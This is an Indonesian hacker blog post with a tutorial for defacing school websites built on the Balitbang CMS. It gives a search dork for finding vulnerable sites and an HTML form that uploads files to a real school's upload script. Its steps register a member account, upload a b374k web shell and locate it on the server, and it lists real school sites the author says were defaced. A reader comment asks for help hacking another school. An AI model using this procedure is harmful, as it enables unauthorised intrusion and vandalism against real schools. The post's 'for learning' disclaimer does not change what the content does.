Oke Vroh Gue Kali ini Mw Share Tehnik Deface Web Sekolah Dengan CRSF Balitbang sebenernya Tehnik ini Udah Jadul Tapi Kalok Bisa Dorking Mah tetep masih banyak web Yg Vuln :v.. Oke Simak Aje Vrooh :
Bahan: 1.Dork:inurl:member/Daftar.php intext:namakota <== Bisa di kembangin Lagi :)
2.CSRF: </head>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<body>
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<center><font face="Iceland"><font size="7" color=Green>Root ./51N1CH1 Java Intelegent Cyber</font></center>
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<center><form enctype="multipart/form-data" action="http://smkcitramutiara.sch.id/functions/simmateriguru.php" method="post"></center>
<center><input name="file" type="file"><input type="submit" value="Upload"></center>
3.Shell.php <== Bisa di cari di Google :)
Oke Udah siap Bahan Kita Lanjut Eksekusi :v
1.Searching di Google atau Yg lain dengan Menggunakan Dork di atas
2.Pilih Salah Satu Web Yg Kira" Vuln saya Ambil contoh : http://smpn48sby.sch.id/
3.Pastikan Anda di http://smpn48sby.sch.id/member/daftar.php
4.isikan Data terserah anda kecuali Alamat Email dan Password Harus benar dan di ingat Karena Nanti akan di gunakan Untuk Login Member
5. Apabila Sudah Semua Klik Simpan
6.Lalu Cek Email Kamu Apabila ada Balasan dari web yg kamu isi tadi Klik Validasi
7.apabila Belum di Patch Atau di Hek Orang lain muncul Login Member Lalu isi User dan Pass Yg anda isi kan tadi
8.Apabila Sudah Masuk Sebagai Member Copy Paste Target ke CSRF yg anda Copy Ke Dalam Notepad yg ber ekstensi .html Contoh : http://smpn48sby.sch.id/
9.Buka CSRF Anda Dengan Mozilla Atau yg Lain Apabila Sudah Muncul Klik Browse pilih Shell yg Mw Kamu Upload :) Lalu Klik Upload
10.Shell Akses : materi/file.php <== Semua Shell yg bernama b374k.php Apabila di upload Jdi file.php
11.Apabila Tidak Muncul Shell Kalian Silahkan Ganti Target :v Karena Sudah di Patch .. Biasanya Faktor Face Anda hahahahaha :v
Sedikit Target Yg Saya Deface :
http://smpn48sby.sch.id/
http://www.sdn6palelehbarat.sch.id/
http://www.sdn10palelehbarat.sch.id/
Quote:tidak semua Web bisa Menggunakan Tehnik Deface Ini :) Dan Ini Hanyalah sebagai Media Pembelajaran Apabila Terjadi sesuatu Kami Tidak Bertanggung Jawab .
By ./51N1CH1 Thanks To : Anggota Java Intelegent Cyber
Promosi itu penting, betul kan gan ? hehe, ijin gelar lapak.
ReplyDeleteOk menarik gan
ReplyDeleteBukan Spamer.. heheh Promosi apa Gan
ReplyDeleteAmar Alif... Iya gan silahkan Di Baca Dan di pelajari ... Semangat
This comment has been removed by a blog administrator.
ReplyDeletegan bisa bantu hack ini www.talentaschool.sch.id
ReplyDelete